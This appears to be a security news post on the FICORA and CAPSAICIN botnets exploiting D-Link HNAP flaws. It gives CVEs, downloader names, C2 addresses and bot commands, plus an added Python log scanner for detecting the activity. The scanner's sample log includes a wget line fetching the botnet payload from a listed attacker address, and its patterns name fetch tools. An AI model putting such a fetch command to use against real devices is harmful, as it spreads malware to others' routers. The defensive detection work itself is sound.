D-Link Vulnerabilities Fuel Global Botnet Attacks

Spike in D-Link Router Attacks: Cybersecurity Experts Warn of New Botnets

Cybersecurity researchers have issued a stark warning about a recent surge in malicious activities targeting vulnerable D-Link routers. These attacks involve two distinct botnets: a Mirai variant known as FICORA and a Kaiten variant called CAPSAICIN. As these cyber threats evolve, it’s crucial for users to remain vigilant and proactive in securing their networks.

According to Fortinet FortiGuard Labs researcher Vincent Li, these botnets exploit documented vulnerabilities in D-Link routers that allow remote attackers to execute arbitrary commands via the Home Network Administration Protocol (HNAP). The HNAP weakness was first disclosed nearly a decade ago and affects numerous devices under several CVE identifiers, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and the newly identified CVE-2024-33112.

Global Impact of FICORA and CAPSAICIN Botnets

Telemetry data from Fortinet indicates that FICORA botnet attacks have been observed across many countries, while CAPSAICIN has primarily targeted East Asia, notably Japan and Taiwan. CAPSAICIN activity in particular intensified between October 21 and 22, 2024, highlighting its aggressive nature.

Mechanisms of Attack

The FICORA botnet deploys a downloader shell script named “multi” from a remote server at the IP address 103.149.87[.]69. The script fetches the main payload, built for several Linux architectures, using wget, ftpget, curl, or tftp. The malware also includes a brute-force feature with a preset list of usernames and passwords, and this Mirai derivative can conduct distributed denial-of-service (DDoS) attacks over UDP, TCP, and DNS.

Similarly, CAPSAICIN employs a downloader script called “bins.sh,” which operates from a different IP address, 87.10.220[.]221. This approach mirrors FICORA’s strategy, ensuring compatibility across various Linux systems.

Key Functions of CAPSAICIN Malware

Once installed, CAPSAICIN takes control of the compromised device, executing commands from its command-and-control (C2) server, 192.110.247[.]46. The botnet can perform a range of malicious tasks, including:

  • GETIP: Retrieve the device’s IP address
  • CLEARHISTORY: Erase command history
  • RNDNICK: Change the victim host’s nickname randomly
  • ENABLE: Activate the bot
  • KILLMYEYEPEEUSINGHOIC: Terminate the original malware

Li emphasizes that despite the vulnerabilities being known and patched almost a decade ago, these attacks continue to pose a significant threat globally.

Importance of Regular Updates

To mitigate the risk of falling victim to these botnets, it is essential for enterprises and home users alike to regularly update their devices’ firmware and maintain vigilant monitoring of their networks.
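As an added illustration of that monitoring (example code written for this page, not code from the article or from Fortinet), the following Python script applies the indicators quoted above to a constructed traffic log: it flags HNAP requests arriving from non-LAN addresses, HNAP requests whose body carries the fetch tools the article names, and any contact with the three listed addresses or with a file named “multi” or “bins.sh”. The log record format and the /HNAP1/ path are assumptions.

```python
import ipaddress
import re

# Indicators quoted in the article (defanged with [.] there; re-joined here for matching).
IOC_IPS = {"103.149.87.69", "87.10.220.221", "192.110.247.46"}
DOWNLOADER_NAMES = {"multi", "bins.sh"}
# Assumption: the D-Link HNAP service is served under /HNAP1/ on the router's web interface.
HNAP_PATH = re.compile(r"^/HNAP1/", re.IGNORECASE)
# The fetch tools the article says the downloader script uses.
FETCH_TOOL = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)
# RFC 1918 ranges only; ipaddress.is_private would also count documentation ranges as private.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Constructed record format (not from the article): src_ip dst_ip METHOD path [optional body]
RECORD = re.compile(r"^(\S+) (\S+) (\S+) (\S+)(?: (.*))?$")

def is_lan(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)

def classify(record: str) -> list[str]:
    """Return the names of every rule a single record triggers (empty list = nothing flagged)."""
    m = RECORD.match(record.strip())
    if not m:
        return ["unparseable"]
    src, dst, _method, path, body = m.groups()
    hits = []
    if src in IOC_IPS or dst in IOC_IPS:
        hits.append("ioc_ip")              # contact with a published downloader or C2 address
    if HNAP_PATH.match(path) and not is_lan(src):
        hits.append("hnap_from_wan")       # HNAP is a LAN admin protocol; WAN callers are suspect
    if HNAP_PATH.match(path) and body and FETCH_TOOL.search(body):
        hits.append("hnap_shell_fetch")    # fetch tooling embedded in an HNAP request body
    if path.rsplit("/", 1)[-1] in DOWNLOADER_NAMES:
        hits.append("downloader_fetch")    # a file named multi / bins.sh pulled from anywhere
    return hits

def scan(log_text: str) -> list[tuple[int, list[str]]]:
    """Run classify() over every non-empty line and return (line_no, hits) for flagged lines."""
    flagged = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line) if line.strip() else []
        if hits:
            flagged.append((n, hits))
    return flagged

# Constructed sample traffic: documentation-range public IPs plus the three article indicators.
SAMPLE_LOG = """\
192.168.0.20 192.168.0.1 POST /HNAP1/ normal-lan-admin
203.0.113.7 192.168.0.1 POST /HNAP1/ wget http://103.149.87.69/multi
192.168.0.1 103.149.87.69 GET /multi
192.168.0.1 192.110.247.46 CONNECT -
192.168.0.20 198.51.100.80 GET /index.html
"""

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(hits)}")
```

Lines 2 to 4 of the sample are flagged; the legitimate LAN-side HNAP call on line 1 and the ordinary browsing on line 5 are not.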

For more information on securing your devices against cyber threats, visit Fortinet’s official blog or read about the latest in cybersecurity best practices.

Have you experienced any suspicious activity on your network? Share your thoughts in the comments below, and follow us on Twitter and LinkedIn for more updates on cybersecurity trends and tips.
